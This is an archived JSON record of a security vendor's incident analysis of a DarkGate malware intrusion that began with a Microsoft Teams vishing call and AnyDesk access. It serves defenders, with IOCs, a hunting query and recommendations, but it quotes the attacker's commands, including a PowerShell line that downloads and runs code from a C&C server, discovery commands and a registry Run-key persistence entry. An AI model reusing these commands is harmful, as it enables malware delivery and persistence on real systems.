{
	"id": "0a769045-1a98-4d36-b1e6-26a3bca48b11",
	"created_at": "2026-04-06T01:29:31.810574Z",
	"updated_at": "2026-04-10T13:11:59.179281Z",
	"deleted_at": null,
	"sha1_hash": "3d031a9d5293dfed9ab0482c0d75c40785604cca",
	"title": "Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1512843,
	"plain_text": "Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\r\nBy Catherine Loveria, Jovit Samaniego, Gabriel Nicoleta, Aprilyn Borja\r\nPublished: 2024-12-13 · Archived: 2026-04-06 00:43:16 UTC\r\nCyber Threats\r\nIn this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool,\r\ntriggering DarkGate malware activities and an attempted C\u0026C connection.\r\nBy: Catherine Loveria, Jovit Samaniego, Gabriel Nicoleta, Aprilyn Borja Dec 13, 2024 Read time: 7 min (1923 words)\r\nSummary\r\nThe Trend Micro Managed Detection and Response (MDR) team analyzed an incident wherein an attacker used\r\nsocial engineering via a Microsoft Teams call to impersonate a user’s client and gain remote access to their system.\r\nThe attacker failed to install a Microsoft Remote Support application but successfully instructed the victim to\r\ndownload AnyDesk, a tool commonly used for remote access.\r\nAfter gaining access to the machine, the attacker dropped multiple suspicious files. One of the suspicious files was\r\ndetected as Trojan.AutoIt.DARKGATE.D.\r\nA series of commands executed by Autoit3.exe led to the connection to a potential command-and-control server and\r\nthe subsequent download of a malicious payload.\r\nPersistent files and a registry entry were created on the victim's machine, though the attack was ultimately thwarted\r\nbefore exfiltration occurred.\r\nUsing Vision One, we observed a recent security incident in which a user was targeted by an attacker posing as an employee\r\nof a known client on a Microsoft Teams call. This led to the user being instructed to download the remote desktop\r\napplication AnyDesk, which then facilitated the deployment of DarkGate malware. 
DarkGate, distributed\r\nvia an AutoIt script, enabled remote control over the user's machine, executed malicious commands, gathered system\r\ninformation, and connected to a command-and-control server. In this blog entry, we discuss how this breach was carried out\r\nin several stages, emphasizing the need for robust security measures and heightened awareness against social engineering\r\nattacks.\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 1 of 10\n\nInitial access\r\nIn this sample case, the attacker used social engineering to manipulate the victim in order to gain access to and\r\ncontrol over a computer system. The victim reported that she first received several thousand emails, after which she\r\nreceived a call via Microsoft Teams from a caller claiming to be an employee of an external supplier. During the call, the\r\nvictim was instructed to download a Microsoft Remote Support application; however, the installation via the Microsoft Store\r\nfailed. The attacker then instructed the victim to download AnyDesk from its official site via browser, and manipulated the\r\nuser into entering her credentials into AnyDesk. Impersonating IT support to potential victims following an email flood is a\r\ntechnique that has been previously disclosed in a Microsoft blog entry.\r\nExecution\r\nThe execution of AnyDesk.exe was observed seconds after the application was downloaded. 
The command run is as follows:\r\n\"C:\\Users\\\u003cuser\u003e\\Downloads\\AnyDesk.exe\" --local-service\r\nThis command runs the AnyDesk remote desktop application and starts it as a local service on the system, allowing it to\r\noperate with elevated privileges or in a minimized/automated fashion.\r\nA few minutes later, cmd.exe was invoked to execute rundll32.exe to load SafeStore.dll, which we assumed was dropped\r\nvia AnyDesk.exe.\r\nprocessCmd: \"C:\\Windows\\System32\\cmd.exe\"\r\neventSubId: 2 - TELEMETRY_PROCESS_CREATE\r\nobjectFilePath: c:\\windows\\system32\\rundll32.exe\r\nobjectCmd: rundll32.exe SafeStore.dll,epaas_request_clone\r\nVision One’s root cause analysis (RCA) in Figure 4 shows a DLL side-loading technique where rundll32.exe was invoked to\r\nexecute an exported function in SafeStore.dll called epaas_request_clone (Figure 3). There are multiple functions exported\r\nby the DLL that can be used to execute the malware (Figure 4).\r\nThe execution of SafeStore.dll, originally named epaas_client.dll, prompts a login form for entering credentials (Figure 5).\r\nWhile the suspicious form was executing, multiple malicious commands were running in the background, even though the user\r\ndid not enter any credentials. 
The commands are as follows:\r\ncmd /c systeminfo – provides detailed information about the system's configuration, including the operating system\r\nversion, hardware specifications, memory, network adapter details, and system uptime.\r\ncmd /c route print – provides the current network routing table, showing how network traffic is directed to different\r\ndestinations based on the system's network configuration.\r\ncmd /c ipconfig /all – provides detailed information about all network interfaces on the system, including IP\r\naddresses, subnet masks, gateways, DNS servers, and other network configuration details.\r\nAll the data gathered from the system was saved to 123.txt, which may be used for system discovery (Figure 6).\r\nDarkGate A3x script\r\nThe executable file SystemCert.exe (SHA256:\r\n4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1), which we believe was dropped via\r\nAnyDesk.exe, was executed and created script.a3x and Autoit3.exe in the C:\\Temp\\test\\ folder (Figure 7).\r\nAfter the script.a3x and AutoIt3.exe files are created, the malicious script script.a3x is executed via the command cmd\r\nc:\\temp\\test\\AutoIt3.exe c:\\temp\\test\\script.a3x.\r\nThe encrypted AutoIt payload script.a3x decrypts itself in memory as shellcode and injects itself into remote processes. One\r\nobserved example was the legitimate binary MicrosoftEdgeUpdateCore.exe, located in C:\\Program Files\r\n(x86)\\Microsoft\\EdgeUpdate. This process is used as a proxy to load and execute the DarkGate script in memory. 
The\r\nexecution flow then loads other types of malware into memory to carry out subsequent stages of the attack.\r\nDiscovery\r\nThen, the following discovery command was executed by Autoit3.exe:\r\nprocessCmd: \"c:\\temp\\test\\Autoit3.exe\" c:\\temp\\test\\script.a3x\r\nobjectCmd: \"c:\\windows\\system32\\cmd.exe\" /c wmic ComputerSystem get domain \u003e\r\nC:\\ProgramData\\fcdcdfc\\kcbbbbc\r\nThis command retrieves information about the system's domain and saves the output to the file kcbbbbc inside the folder\r\nC:\\ProgramData\\fcdcdfc.\r\nDefense evasion\r\nA replicated scenario of this attack shows that Autoit3.exe looks for multiple well-known antivirus products.\r\nIt was also observed that multiple randomly named files were created in different locations, as well as copies of Autoit3.exe.\r\nThis technique is used to evade detection.\r\nCommand and control\r\nAutoit3.exe also executed script.a3x to inject into the MicrosoftEdgeUpdateCore.exe process, which was then observed\r\nconnecting to the external IP 179.60.149[.]194:80, a C\u0026C server.\r\nprocessCmd: \"c:\\temp\\test\\Autoit3.exe\" c:\\temp\\test\\script.a3x\r\neventSubId: 2 - TELEMETRY_PROCESS_CREATE\r\nobjectFilePath: C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.35\\MicrosoftEdgeUpdateCore.exe\r\nA few minutes after the connection to IP 179.60.149[.]194, a VBScript was executed via cscript.exe:\r\nobjectCmd: cscript spamfilter_v1.4331.vbs\r\nBased on the contents of the VBScript file spamfilter_v1.4331.vbs, it runs a PowerShell command, then runs script.a3x\r\nvia Autoit3.exe.\r\nFinal DarkGate payload\r\nThis event was accompanied by the execution of a PowerShell command that dropped the DarkGate payload:\r\nobjectCmd: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" 
-Command Invoke-Expression (Invoke-RestMethod -Uri hxxp://179.60.149[.]194:8080/fdgjsdmt)\r\nThe command above attempts to download fdgjsdmt from hxxp://179.60.149[.]194:8080 and execute it. The downloaded\r\nscript has the following content:\r\nobjectRawDataStr: ni 'C:/rbne/dxqu/' -Type Directory -Force;cd 'C:/rbne/dxqu/';Invoke-WebRequest -Uri\r\n\"hxxp://179.60.149[.]194:8080/dogjaafa\" -OutFile 'file.zip';Expand-Archive -Path 'file.zip' -DestinationPath 'C:/rbne/dxqu/';\r\nThis script first creates a directory at C:\\rbne\\dxqu\\ (ni is an alias of the New-Item cmdlet) if it doesn't already exist. The -Force\r\nflag forces the creation even if the directory already exists or if it has hidden or system attributes. It then attempts to\r\ndownload a file (dogjaafa) and save it as file.zip.\r\nExpand-Archive is a PowerShell cmdlet used to extract the contents of a zip file. This command extracts the contents of the\r\ndownloaded file.zip into the C:\\rbne\\dxqu\\ directory. The file.zip was dropped to C:\\rbne\\dxqu\\ and contains a malicious\r\nAutoIt script.\r\nA few minutes later, an executable file, StaticSrv.exe (SHA256:\r\nfaa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b), dropped in the C:\\Users\\\u003cuser\u003e\\ folder, was\r\nexecuted and invoked AutoIt3.exe to run script.a3x. 
StaticSrv.exe and SystemCert.exe exhibit the same behavior.\r\nPost-installation activities\r\nMultiple files and a registry entry were then created for persistence:\r\nC:\\ProgramData\\fcdcdfc\\gdhfdfd\\18-11-2024.log (encrypted key logs)\r\nC:\\ProgramData\\fcdcdfc\\kkfafef\r\nC:\\Temp\\gggahbb\r\nC:\\Temp\\hbakdef\r\nThe following files were also created by Autoit3.exe, including a copy of itself, possibly for backup purposes:\r\nC:\\ProgramData\\fcdcdfc\\Autoit3.exe\r\nC:\\ProgramData\\fcdcdfc\\bbbckdb.a3x\r\nC:\\Temp\\cdcecgg\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\EaDeKFb\r\nThe registry entry created by MicrosoftEdgeUpdateCore.exe is as follows:\r\nRegistry root: 2\r\nRegistry key: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry value name: ddadcae\r\nRegistry value data: \"C:\\ProgramData\\fcdcdfc\\Autoit3.exe\" C:\\ProgramData\\fcdcdfc\\bbbckdb.a3x\r\nRegistry value type: 1\r\nConclusion and security recommendations\r\nIn the case we have studied, the attack was prevented before the attacker achieved their objective. No activities\r\nrelated to exfiltration were found. DarkGate is primarily distributed through phishing emails, malvertising and SEO poisoning.\r\nHowever, in this case, the attacker leveraged voice phishing (vishing) to lure the victim. The vishing\r\ntechnique has also been documented by Microsoft, in a case where the attacker utilized Quick Assist to\r\ngain access to its target to distribute ransomware.\r\nTo protect themselves from attacks like the one discussed in this blog entry, organizations can apply the following best\r\npractices:\r\nThoroughly vet third-party technical support providers. 
While legitimate third-party technical support services\r\nexist, organizations should ensure that any claims of vendor affiliation are directly verified before granting remote\r\naccess to corporate systems. Cloud vetting processes should be established to evaluate and approve remote access\r\ntools, such as AnyDesk, by assessing their security compliance and the reputation of their vendors.\r\nWhitelist approved remote access tools and block any unverified applications. Organizations should integrate\r\nmulti-factor authentication (MFA) on remote access tools to add an additional layer of protection by requiring\r\nmultiple forms of verification before access is granted. This reduces the risk of malicious tools being used to gain\r\ncontrol over internal machines.\r\nProvide employee training to raise awareness about social engineering tactics, phishing attempts, and the\r\ndangers of unsolicited support calls or pop-ups. Well-informed employees are less likely to fall victim to social\r\nengineering attacks, strengthening the organization’s overall security posture.\r\nTo effectively combat the evolving threat landscape, organizations must prioritize a layered security approach. Solutions like\r\nTrend Micro Apex One™ with XDR offer a complete security-as-a-service (SaaS) solution, providing full\r\naccess to the XDR capabilities in Trend Vision One™ for detecting, responding to, and enhancing the\r\nprevention of cyberattacks. 
Additionally, Trend Micro™ Managed XDR, included in Trend Service\r\nOne™, plays a crucial role by delivering round-the-clock monitoring, defense, and detection to ensure\r\ncontinuous protection against emerging threats.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights\r\nwithin Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better\r\nprepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the\r\ntechniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments,\r\nmitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nVishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\r\nSpike in DarkGate Activity - with a new version and new infrastructure\r\nA new DARKGATE campaign was observed\r\nTrend Micro Vision One Threat Insights App\r\nEmerging Threats: Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTo hunt for possible malicious activities relating to DarkGate, you may use the query below. The threat hunting query below\r\ndetects the presence of Autoit3 and script files (.a3x) that are being created and executed. 
Note that this can also be triggered\r\nby normal activity.\r\neventSubId: 101 - TELEMETRY_FILE_CREATE\r\neventSubId: 2 - TELEMETRY_PROCESS_CREATE\r\neventSubId:101 and eventSubId:2 and (objectCmd:(Autoit3.exe or *.a3x) or processCmd:(Autoit3.exe or *.a3x))\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nIndicators of Compromise (IOCs)\r\nSHA256  Indicator  Detection\r\n1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a  SafeStore.dll  Trojan.Win64.DARKGAT\r\n4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1  SystemCert.exe  Trojan.Win32.DARKGAT\r\nfaa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b  StaticSrv.exe  Trojan.Win32.DARKGAT\r\nbb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922  script.a3x  Trojan.AutoIt.DARKGAT\r\ne4d13af4bfc3effe4f515c2530b1b182e18ad0c0a3dacac4dd80d6edcf0b007a  spamfilter_v1.4331.vbs  Trojan.VBS.DARKGATE\r\nURL/IP  Rating  Category\r\n179.60.149.194  Dangerous  C\u0026C Server\r\nhxxp://179[.]60[.]149[.]194:8080/fdgjsdmt  Dangerous  Malware Accomplice\r\nSource: https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html"
	],
	"report_names": [
		"darkgate-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438971,
	"ts_updated_at": 1775826719,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3d031a9d5293dfed9ab0482c0d75c40785604cca.pdf",
		"text": "https://archive.orkl.eu/3d031a9d5293dfed9ab0482c0d75c40785604cca.txt",
		"img": "https://archive.orkl.eu/3d031a9d5293dfed9ab0482c0d75c40785604cca.jpg"
	}
}